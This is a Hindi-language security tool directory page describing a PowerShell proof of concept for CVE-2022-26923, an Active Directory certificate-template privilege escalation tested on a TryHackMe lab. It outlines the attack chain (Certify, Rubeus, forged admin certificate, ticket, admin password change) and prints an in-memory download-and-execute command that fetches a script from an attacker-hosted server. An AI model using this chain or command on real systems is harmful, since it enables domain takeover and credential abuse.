Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26923-Powershell-POC — एक powershell poc जो Certify और Rubeus को मेमोरी से लोड और स्वचालित रूप से चलाता है। | Kitploit
उपकरण/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

एक powershell poc जो Certify और Rubeus को मेमोरी से लोड और स्वचालित रूप से चलाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1784 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-26923-Powershell-POC

Certify और Rubeus को मेमोरी से लोड करने और स्वचालित रूप से चलाने के लिए एक PowerShell POC।

यह कैसे काम करता है?

  1. Certify.exe और Rubeus.exe को मेमोरी में लोड करता है।
  2. लक्ष्य मशीन पर गलत कॉन्फ़िगर की गई प्रमाणपत्र टेम्पलेट्स को स्कैन करता है। (अधिक जानकारी के लिए https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. कमजोर टेम्पलेट के आधार पर, प्रशासनिक उपयोगकर्ता के लिए एक प्रमाणपत्र का अनुरोध करता है।
  4. प्रमाणपत्र को प्रमाणपत्र हैंडलर को भेजता है, यह इसे .pfx प्रारूप में बदलता है और इसे क्लाइंट को वापस भेजता है।
  5. प्रमाणपत्र को लोड करने और प्रशासनिक उपयोगकर्ता के लिए एक टिकट उत्पन्न करने के लिए Rubeus का उपयोग करता है।
  6. प्रशासनिक उपयोगकर्ता का पासवर्ड बदलता है। (केवल डेमो के लिए)

POC निम्नलिखित TryHackMe Labs पर परीक्षण किया गया है: https://tryhackme.com/room/adcertificatetemplates

यह CVE विशेषाधिकार वृद्धि (privilege escalation) के लिए उपयोग किया जाता है, इसलिए इस डेमो या THM Lab में कोई प्रारंभिक शोषण (initial exploitation) शामिल नहीं है।

चरण:

  1. python3 -m http.server 80 [हमलावर बॉक्स]
  2. python3 uploader.py 8000 [हमलावर बॉक्स]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [पीड़ित बॉक्स]

नोट: यह POC शैक्षिक उद्देश्य के लिए है, आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।

टूल डाउनलोड करें